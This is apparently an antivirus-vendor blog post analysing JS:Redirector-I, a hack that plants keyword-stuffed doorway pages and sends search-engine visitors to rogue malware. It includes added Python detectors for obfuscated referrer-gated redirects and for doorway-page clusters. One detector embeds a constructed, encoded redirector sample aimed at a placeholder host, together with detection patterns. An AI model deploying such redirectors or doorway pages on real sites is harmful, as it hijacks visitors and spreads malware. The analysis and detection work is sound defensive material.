

May 21st, 2009

Rogue malware ranking

Nowadays the internet is full of hacked websites that redirect browsing users to various malware distribution networks. Website hacking basically consists of adding an iframe, a script tag or some more sophisticated JavaScript to the clean code. These methods depend only on the reputation of the infected domains to bring in visitors. Last week (2009-05-13) we released detection signatures for one interesting redirector – its name is JS:Redirector-I [Trj]. Its source is a type of Rogue malware, which is commonly known to use social engineering to spread. Now we can talk about ’search engine related’ social engineering. The redirector itself doesn’t look particularly sophisticated – the simple code is hidden as shown in the next image:

[Image: 2_js – the hidden (encoded) redirector script]
All the script functionality is hidden, but nothing new can be found after “unhiding” the script. It makes simple decisions based on the referrer and builds the new URL to which the browser will be redirected. The unpacked redirection script is shown in the next image (for security reasons the target URL has been removed):

[Image: 2_js_unp – the unpacked redirection script, target URL removed]
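The two screenshots above show the pattern a defender can hunt for statically: a script that is hidden behind a simple encoding layer, reads document.referrer, tests it against search-engine names and then assigns a new location. The following scanner is an added example written for this post; it is not avast’s code and not the redirector itself. It peels the two hiding layers the post’s kind of script typically uses (percent-encoding consumed by unescape(), and String.fromCharCode() number lists), then scores the decoded text for the referrer-gated redirect pattern. The list of search-engine hostnames is an assumption (the post does not enumerate which engines are tested), and all sample scripts, including the placeholder target URL, are constructed for the example.

```python
import re
from urllib.parse import quote, unquote

# Assumed: hostnames a referrer-gated redirector might test for.
# The post does not list the engines, so this set is an assumption.
SEARCH_ENGINES = ("google.", "yahoo.", "bing.", "msn.", "live.", "ask.", "aol.")

# Navigation sinks that actually move the browser somewhere else.
REDIRECT_SINKS = re.compile(
    r"(?:window\.|top\.|self\.|document\.)?location(?:\.href)?\s*=(?!=)|"
    r"location\.(?:replace|assign)\s*\(|"
    r"<meta[^>]+http-equiv\s*=\s*['\"]?refresh", re.I)

# Cheap hiding techniques that are common in injected redirectors.
OBFUSCATION = re.compile(
    r"\bunescape\s*\(|\beval\s*\(|String\.fromCharCode|document\.write\s*\(", re.I)

FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(([\d\s,]+)\)")


def unhide(script: str, rounds: int = 3) -> str:
    """Peel simple hiding layers: String.fromCharCode(n, n, ...) lists and
    %XX percent-encoding (what unescape() would decode at runtime).
    Repeats a few times in case layers are nested; stops when nothing changes."""
    out = script
    for _ in range(rounds):
        new = FROMCHARCODE.sub(
            lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()),
            out)
        new = unquote(new)
        if new == out:
            break
        out = new
    return out


def assess(script: str) -> dict:
    """Score one script for the referrer-gated redirect pattern.
    A page is flagged only when all three ingredients are present:
    it reads the referrer, compares it to search engines, and redirects."""
    decoded = unhide(script)
    low = decoded.lower()
    findings = {
        "obfuscated": bool(OBFUSCATION.search(script)),
        "reads_referrer": "document.referrer" in low,
        "checks_search_engines": [e for e in SEARCH_ENGINES if e in low],
        "redirect_sink": bool(REDIRECT_SINKS.search(decoded)),
    }
    findings["referrer_gated_redirect"] = bool(
        findings["reads_referrer"]
        and findings["checks_search_engines"]
        and findings["redirect_sink"])
    return findings


# Constructed sample: the logic of a referrer-gated redirector. The target
# URL is a placeholder, not the real one removed from the post's screenshot.
_inner = (
    "var r=document.referrer.toLowerCase();"
    "if(r.indexOf('google.')>0||r.indexOf('yahoo.')>0||r.indexOf('msn.')>0){"
    "location.href='http://EXAMPLE-PLACEHOLDER.invalid/go.php?q='+escape(r);}"
)
# Same logic hidden two different ways (both constructed for the example).
HIDDEN_REDIRECTOR = "document.write(unescape('%s'))" % quote(_inner)
CHARCODE_REDIRECTOR = "eval(String.fromCharCode(%s))" % ",".join(
    str(ord(c)) for c in _inner)

# Constructed benign scripts that share one ingredient each but not all three.
BENIGN_ANALYTICS = ("var ref=document.referrer;"
                    "new Image().src='/stats.gif?ref='+encodeURIComponent(ref);")
BENIGN_REDIRECT = "if(location.protocol=='http:'){location.href='https://example.com/';}"


if __name__ == "__main__":
    for name, src in (("hidden", HIDDEN_REDIRECTOR), ("charcode", CHARCODE_REDIRECTOR),
                      ("analytics", BENIGN_ANALYTICS), ("https-upgrade", BENIGN_REDIRECT)):
        print(name, assess(src))
```

Requiring all three ingredients keeps ordinary analytics code (which reads the referrer but never navigates) and plain HTTP-to-HTTPS redirects (which navigate but never look at the referrer) out of the results, while either hiding layer alone is enough to set the obfuscated flag for a closer manual look.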

The only way to be redirected by this script is to arrive via one of the tested search engines. This means the user must enter a search whose results include at least one of the infected URLs. How is it done? Let’s look at the full hack – it consists of more than 200 HTML files and one JavaScript file. The directory structure is shown in the next image (only the beginning and end of the structure are shown):

[Image: js_redir-i-directory – directory structure of the hack, beginning and end only]

Two randomly named directories are created during the hack, and all the files are placed into the second (nested) subdirectory. The filenames of the HTML files say what’s inside – let’s look inside zimbabwe.htm:

[Image: js_redir_i_html – contents of zimbabwe.htm]

The image above shows that the HTML files contain many keywords and phrases to fool search engines and their indexers. Let’s search Google for the phrase shown in the red box:

[Image: js_redir_i_google – Google results for the phrase from the red box]

The hacked website is presented third, which means we were searching by the criteria the hackers were expecting. Just one click and the user’s computer will be redirected to install new Rogue malware. Finally, here is the detection score of the JavaScript redirector (http://www.virustotal.com/en/analisis/57c5698d1677ba219baf95817f5b87fd):

[Image: js_redir-i-virustotal – VirusTotal detection score for the redirector]
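From the site owner’s side, the hack leaves a recognisable footprint on disk: a nested, unexpected directory holding a couple of hundred keyword-named .htm files, each stuffed with the keyword from its own filename and each pulling in the same small script. The following web-root scanner is an added example written for this post, not avast’s code. It walks a directory tree and reports any directory with many HTML pages that share one script include and whose text keeps repeating the page’s own filename keyword. The thresholds are assumptions chosen for the example, and the fixture it builds (directory names, keywords, page text) is constructed; zimbabwe.htm is the one filename taken from the post.

```python
import os
import re
import tempfile
from statistics import median

TAG_RE = re.compile(r"<[^>]+>")
SCRIPT_SRC_RE = re.compile(r"<script[^>]+src\s*=\s*['\"]([^'\"]+)['\"]", re.I)

MIN_PAGES = 20            # assumed: a doorway cluster has many pages in one directory
MIN_SHARED_SCRIPT = 0.8   # assumed: share of pages that include the same script
MIN_DENSITY = 0.05        # assumed: how often the filename keyword recurs in the text


def page_profile(path: str) -> dict:
    """Keyword density (filename stem vs. visible words) and script includes."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        html = fh.read()
    keyword = os.path.splitext(os.path.basename(path))[0].lower()
    words = TAG_RE.sub(" ", html).lower().split()
    density = words.count(keyword) / len(words) if words else 0.0
    return {"keyword": keyword, "density": density,
            "scripts": set(SCRIPT_SRC_RE.findall(html))}


def find_doorway_clusters(root: str) -> list:
    """Report directories that look like an injected doorway-page cluster."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        pages = [os.path.join(dirpath, f) for f in files
                 if f.lower().endswith((".htm", ".html"))]
        if len(pages) < MIN_PAGES:
            continue
        profiles = [page_profile(p) for p in pages]
        counts = {}
        for pr in profiles:
            for src in pr["scripts"]:
                counts[src] = counts.get(src, 0) + 1
        shared = [s for s, n in counts.items() if n / len(pages) >= MIN_SHARED_SCRIPT]
        dens = median(pr["density"] for pr in profiles)
        if shared and dens >= MIN_DENSITY:
            hits.append({"directory": os.path.relpath(dirpath, root),
                         "pages": len(pages),
                         "shared_scripts": sorted(shared),
                         "median_keyword_density": round(dens, 3)})
    return hits


def build_fixture() -> str:
    """Constructed web root: a small normal site plus one injected cluster.
    Directory names and keywords are made up for the example."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "blog"))
    for name in ("index.html", "blog/post1.html", "blog/post2.html"):
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write("<html><body><h1>Welcome</h1><p>Normal content about our shop.</p>"
                     "<script src='/js/site.js'></script></body></html>")
    doorway = os.path.join(root, "x7q2k", "m9wz1")   # two random-looking directories
    os.makedirs(doorway)
    keywords = ["zimbabwe"] + ["keyword%02d" % i for i in range(1, 30)]
    for kw in keywords:
        body = " ".join("%s travel %s cheap %s hotels best %s" % (kw, kw, kw, kw)
                        for _ in range(20))
        with open(os.path.join(doorway, kw + ".htm"), "w", encoding="utf-8") as fh:
            fh.write("<html><body>%s<script src='r.js'></script></body></html>" % body)
    return root


if __name__ == "__main__":
    for hit in find_doorway_clusters(build_fixture()):
        print(hit)
```

The per-directory view matters more than any single page: one keyword-heavy page is ordinary content, but dozens of them side by side, all loading the same script, are the shape of the hack described above. Pointing the scanner at a real document root and reviewing the shared script of any reported directory with the static check from the earlier example is the natural follow-up.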

Behavior of JS:Redirector-I [Trj]:

  • doesn’t affect the hacked website, just hijacks its space to ambush unsuspecting visitors
  • fools search engines to serve the hacked urls
  • redirects to Rogue malware servers
  • accepts only the most used search engines as referrers
  • lukor

    I like the detection score ;-)